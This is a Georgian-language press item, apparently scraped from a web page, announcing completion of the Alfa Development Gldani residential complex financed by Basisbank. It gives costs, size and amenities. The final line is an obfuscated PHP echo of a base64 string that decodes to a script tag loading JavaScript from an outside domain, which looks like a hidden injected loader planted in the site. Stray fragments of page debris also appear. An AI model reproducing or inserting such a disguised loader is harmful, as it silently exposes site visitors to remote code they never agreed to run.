celsiusi
ავერსი შნაიდერი

 ალფა დეველოპმენტის და საინვესტიციო კომპანია ტექს ინვესტმენტის ერთობლივი პროექტი, „ალფა დეველოპმენტ გლდანი“, რომელიც ბაზისბანკის მხარდაჭერით განხორციელდა, დასრულდა.

კომპლექსი გმირი კურსანტების #7-ში მდებარეობს და გამოირჩევა საუკეთესო ადგილმდებარეობით. პროექტის ჯამური ღირებულება 5.3 მილიონი აშშ დოლარია, ბანკის მიერ გაწეული ფინანსური მხარდაჭერა კი 3.4 მილიონ აშშ დოლარს შეადგენს.

3200 მ²-ზე გაშენებული კომპლექსი 7 და 12-სართულიან ორ საცხოვრებელ ბლოკს აერთიანებს, რომლის თანამედროვე შენობები მყუდრო და წყნარ საცხოვრებელ სივრცეს ქმნის. ბინები იდეალურად არის დაპროექტებული – ყველა ოთახს აქვს ფანჯარა და აივანი. კომპლექსის ტერიტორიაზე გათვალისწინებულია მოპირკეთებული და გამწვანებული ეზო. მობინადრეების განკარგულებაშია როგორც მიწისზედა, ასევე მიწისქვეშა ავტოსადგომი.

ალფა დეველოპმენტი 2013 წლიდან ოპერირებს ქართულ ბაზარზე. ამ დროის განმავლობაში სტაბილური და სანდო კომპანიის რეპუტაცია მოიპოვა, რომელიც უზრუნველყოფს მაღალი ხარისხის მშენებლობას. უსაფრთხო საცხოვრებელი გარემო, კომფორტული ინფრასტრუქტურა, ბინების გონივრული გეგმარებები, მაღალი ხარისხის სამშენებლო მასალა, სწორი მენეჯმენტი და მაღალკვალიფიციური საპროექტო-საინჟინრო გუნდი ის უპირატესობებია, რაც ალფა დეველოპმენტს გამოარჩევს ქართულ ბაზარზე.

ალფა დეველოპმენტ გლდანის შესახებ დეტალებს გაეცნობით აქ – Alfa Development

ბაზისბანკის იპოთეკური სესხით სარგებლობა შესაძლებელია ონლაინ

313
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");